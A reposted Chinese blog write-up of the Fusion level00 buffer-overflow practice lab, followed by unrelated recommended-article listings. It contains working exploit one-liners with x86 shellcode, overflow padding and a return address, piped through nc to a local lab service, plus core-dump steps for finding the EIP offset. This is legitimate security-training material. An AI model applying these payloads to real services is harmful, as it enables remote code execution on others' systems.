Fusion level00

最新推荐文章于 2025-08-22 23:47:35 发布
最新推荐文章于 2025-08-22 23:47:35 发布
阅读量144 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python
原文链接:https://my.oschina.net/u/209614/blog/311443
本文详细解析了漏洞利用过程中的关键代码逻辑,包括特殊路径构造、shellcode注入及核心偏移量计算等,提供了从错误理解到正确实现的全过程分析,并附带解答了关于EIP填充字符数量的疑惑,以及核心文件的生成与调试方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

1.if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open

就算path不存在,resolved也会被赋值成path
记错了,想成path不存在resolved就会赋值NULL,搞得我一直在构造特殊路径
PS:python或者perl可以构造特殊路径和文件,比如
install -d `python -c 'print "\x90"*90'`   但是要注意如果shellcode中有/,那么就会生成多个目录

2.原本的想法是

python -c 'print "GET "+"/home/fusion/"+"\x90"*25+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0f\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x70\x6f\x6f\x00\x57\x53\x89\xe1\xcd\x80"+"/"+"A"*51+"\x0f\xf9\xff\xbf"+" HTTP/1.1"' | nc localhost 20000

本来这样也是也行的,但是shellcode中"\x00",被当成了字符串的结束了.然后就不能读到HTTP/1.1了

索性就看了下别人的答案,看到别人是把shellcode写在HTTP/1.1后面,哎,我也是醉了,咋没多想一步呢?

fusion@fusion:/$ perl -e 'print "GET /". "A"x139 . "\x99\xf9\xff\xbf" . " HTTP/1.1\n" . "\x90"x100 . "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0f\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x70\x6f\x6f\x00\x57\x53\x89\xe1\xcd\x80"' | nc localhost 20000

3.为什么EIP前面的的填充字符个数是139个?

自己计算的是128+8+4,应该是140个啊,不应该是139个.

4.看别人是有core生成的,可以调试得到EIP的偏移量

#ulimit -c unlimited

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'

可以在/tmp目录下看到core

题目链接:

http://exploit-exercises.com/fusion/level00

答案链接:

https://www.mattandreko.com/2012/04/09/exploit-exercises-fusion-00/

http://terrying.blog.51cto.com/2147205/1198018

转载于:https://my.oschina.net/u/209614/blog/311443

【论文阅读】PSFusion:Rethinking the necessity of image fusion in high-level vision tasks
Prettybritany的博客
06-10 2104
场景恢复分支旨在重建红外图像̂Iir和可见光图像̂Ivi,以及合成融合图像If;稀疏语义感知分支负责预测边界分割结果Ibd、语义分割结果Ise和二值分割结果Ibi。为了在语义感知分支和场景恢复分支之间轻松注入语义特征,我们期望共享这两个分支之间的特征提取网络。然而,场景恢复分支需要保持高分辨率特征以保留细节,而高级视觉任务需要降采样来提取足够的语义特征并捕捉整体结构。这两个要求之间的矛盾阻碍了我们使用现有的骨干作为特征提取网络。
Multimodal Fusion(多模态融合)
热门推荐
nakaizura
03-28 20万+
Jeff Dean:我认为,2020年在多任务学习和多模态学习方面会有很大进展,解决更多的问题。我觉得那会很有趣。 多模态融合 (Multimodal Fusion) 一般来说,每一种信息的来源或者形式,都可以称为一种模态(Modality),目前研究领域中主要是对图像,文本,语音三种模态的处理。之所以要对模态进行融合,是因为不同模态的表现方式不一样,看待事物的角度也会不一样,所以存在一些交叉(所...
黑客入门之fusion level01
无心插柳
09-29 7025
黑客入门基本技能,重要的是思想和思考问题的方法,通过做题来一步一步达到一个脚本小子的水平。
黑客入门之fusion level02
无心插柳
10-18 5980
Level 02 introduces nonexec stack and heap to go with the ASLR. #include "../common/common.c" #define XORSZ 32 void cipher(unsigned char *blah, size_t len) { static int keyed; static unsign
gated multi-level fusion
邹小驴
05-30 132
Gated Fully Fusion for Semantic Segmentation:DecoupleSegNets/gffnets.py at master · lxtGH/DecoupleSegNets · GitHub
【文献阅读】Multi-Level Fusion based 3D Object Detection from Monocular Images
weixin_43543177的博客
11-25 2654
多层级融合的单目图像3D目标检测一、文章贡献二、方法概览 overview2.1 Objectives2.2 Network三、Related work2D Object DetectionMonocular 3D Object Detection四、Framework3.1 2D region proposal generation3.2 2D/3D Parameters Estimation3.3 Multi-Level Fusion and 3D LocalizationDisparity infor
Medical image fusion using multi-level local extrema论文matlab程序
恰同学少年的博客
12-27 2062
本文程序是根据论文"Xu Z. Medical image fusion using multi-level local extrema[J]. Information Fusion, 2014, 19: 38-48."编写的,其中用到的提取局部极值平滑滤波的程序是论文"Subr K, Soler C, Durand F. Edge-preserving multiscale image de
Attention-based Multi-Level Fusion Network for Light Field Depth Estimation
weixin_43559672的博客
11-26 2864
摘要 从光场图像中估计深度是光场相关应用的一个重要基础。因为可以获得带有丰富信息的大量的view,如何有效融合这些view的特征就成为了精确的光场深度估计的关键点。在这片论文中,我们提出了一个新的基于注意力的多层融合网络。与四层分支网络结构结合,我们设计了一个intra-branch融合策略来分层融合不同view的有效特征。通过引入注意力机制,选择这些分支内部和之间的遮挡较少和丰富纹理的view特征来为深度估计提供更有效的特征。在进一步聚合之后得到估计的深度图。实验结果表明提出的算法在定量和定性评价上都达到
Multi-level Feature Fusion Networks with Adaptive Channel Dimensionality Reduction for Remote Sens
b_dxac的博客
05-07 817
基于自适应信道降维的多级特征融合网络用于遥感场景分类 由于高分辨率遥感图像内容复杂多样,对其进行分类是一项具有挑战性的工作。最近,卷积神经网络(CNNs)被用来解决这一任务。然而,由于VHR图像中存在杂波和小目标,cnn不能完全满足场景分类的需要。为了解决这些问题,本文提出了一种新的自适应信道降维的多级特征融合网络用于遥感场景分类。针对高维特征,设计了一种自适应信道降维方法。在此基础上,引入多级特征融合模块,实现了特征的高效融合。在三个广泛使用的数据集上的实验表明,我们的模型在精度和稳定性方面优于几种先进
Co-saliency detection based on region-level fusion and pixel-level refinement
02-09
Co-saliency detection based on region-level fusion and pixel-level refinement
论文研究-Multi-level image fusion and enhancement for target detection.pdf
08-19
根据文件所提供的信息,该研究论文主要讨论了一种用于目标探测的多层级图像融合与增强方法,具体涉及了红外与可见光图像的融合算法。下面对论文中提到的关键知识点进行详细阐述。 ### 多层级图像融合和增强 ...
Feature fusion using Canonical Correlation Analysis (CCA):Feature level fusion using Canonical Correlation Analysis (CCA)-matlab开发
05-29
特征融合是将两个特征向量组合得到单个特征向量的过程,它比任何一个输入特征向量都更具判别力。 CCAFUSE 使用基于典型相关分析 (CCA) 的方法应用特征级融合。 它从两个模态 X 和 Y 中获取训练和测试数据矩阵,并将...
java基础知识总结
yvya_的博客
08-19 1518
java 基础包含语法、面向对象,异常处理、文件操作等方面。
【GPT入门】第49课 LlamaFacotory 训练千问
spark_dev的博客
08-20 769
避坑经验:发现先安装vllm后安装LlamaFactory有依赖冲突,改为先安装LlamaFacotory后安装vllm。直接安装 2.2.0,这个安装有点久,耐心等。合并原模型与lora训练结果。autodl的学术加速。训练后,目录结构与大小。
数据预处理数据清洗准备篇-------pandas库的缺失值处理方法
Sunhen_Qiletian的博客
08-20 1220
解析引擎,可选 'c' (C语言引擎,更快) 或 'python' (Python引擎,功能更全):填充方法 ('backfill', 'bfill', 'pad', 'ffill', None):0 或 'index' (检查每列),1 或 'columns' (检查每行):0 或 'index' (删除行),1 或 'columns' (删除列):'any' (有缺失就删除) 或 'all' (全部为缺失才删除):文件编码,如 'gbk', 'utf-8' 等。
Selenium使用指南
HUACE4600的博客
08-19 1379
前面的代码你看不懂,也没关系,我们再来叙述一下selenium工作的过程1.selenium client(python等语言编写的自动化测试脚本)初始化一个service服务,通过Webdriver启动浏览器驱动程序chromedriver.exe2.通过RemoteWebDriver向浏览器驱动程序发送HTTP请求,浏览器驱动程序解析请求,打开浏览器,并获得sessionid,如果再次对浏览器操作需携带此id。
疏老师-python训练营-Day53 对抗生成网络
最新发布
weixin_44861705的博客
08-22 399
然后我随机初始化这个造假币的a,我每次给他随机的输入,他会生成不同的假币,每一张假币都会让警察来判断,警察能够分别出真假,如果说你是假的,那么造假币的就要更新参数,如果是真的,那么造假币的参数就不用更新,警察要更新参数。为了让警察能分辨真币,我需要给他看真币的样子,也就是先训练警察知道什么是真币,但是只给他一个真币他也没法训练,我中间得掺杂一些无意义的噪声图片,无意义的肯定不可能是真币,所以他大概可以训练好。那么如何评价好这个分布情况呢?判别器的损失定义在先,生成器的损失定义基于判别器的反馈。
Huggingface-Qwen2源码解读
Jeremy程序员
08-19 1613
本文记录了基于HuggingFace Transformers最新master分支对Qwen2模型的学习过程。主要内容包括:1) 开发环境搭建(Python 3.11、PyTorch CPU版);2) 模型测试代码实现,通过调参创建轻量级配置;3) 核心架构分析,包括分词编码、DecoderLayer处理流程(RMSNorm归一化、自注意力机制、前馈网络)和分组查询注意力机制;4) Qwen2的三大优化点:RMSNorm计算优化、RoPE位置编码和GQA注意力机制;5) 开发中遇到的版本依赖问题及解决方法。
【无标题】
As3310010的博客
08-20 697
从基础功能到自主决策:Agent 开发进阶之路
Decision Level Fusion
02-28
### 决策级融合概述 决策级融合是一种多传感器数据处理技术,在该过程中,来自不同传感器的数据经过独立处理并转换成决策或分类结果之后再进行综合分析。这种方式允许系统利用多个源的信息来提高最终判断的准确性、可靠性和鲁棒性[^1]。 ### 方法论 为了实现有效的决策层融合,通常会采用一系列特定的方法和技术: - **投票机制**:通过简单多数原则或其他加权方案对各个单独模型的结果进行汇总; - **贝叶斯推理框架**:基于概率理论计算联合分布函数从而得出最优解; - **神经网络集成学习**:训练一组弱分类器并将它们组合起来形成更强的整体预测能力。 这些策略可以显著增强系统的性能表现,并且能够适应复杂环境下的变化需求[^2]。 ### 应用场景实例 在自动驾驶领域内,Waymo公司就成功应用了这种理念构建其车辆感知模块。具体来说,该公司采用了多种类型的探测装置(如激光雷达LiDAR、摄像头Camera以及毫米波雷达Radar),每种设备负责收集不同类型的道路状况信息。随后,软件平台会对上述原始资料分别解析得到初步结论,最后借助于高级算法完成统一协调工作——即所谓的“创建一致连贯内部表示”,以此确保行车安全高效运行。 ```python def decision_fusion(vote_results): """ 实现简单的投票法来进行决策级别融合 参数: vote_results (list): 不同模型给出的类别标签列表 返回: str: 融合后的最终决定 """ from collections import Counter counter = Counter(vote_results) return max(counter.items(), key=lambda x:x[1])[0] # 假设有三个不同的AI代理做出了如下判定 model_predictions = ['safe', 'unsafe', 'safe'] final_decision = decision_fusion(model_predictions) print(f"The final decision after fusion is {final_decision}.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值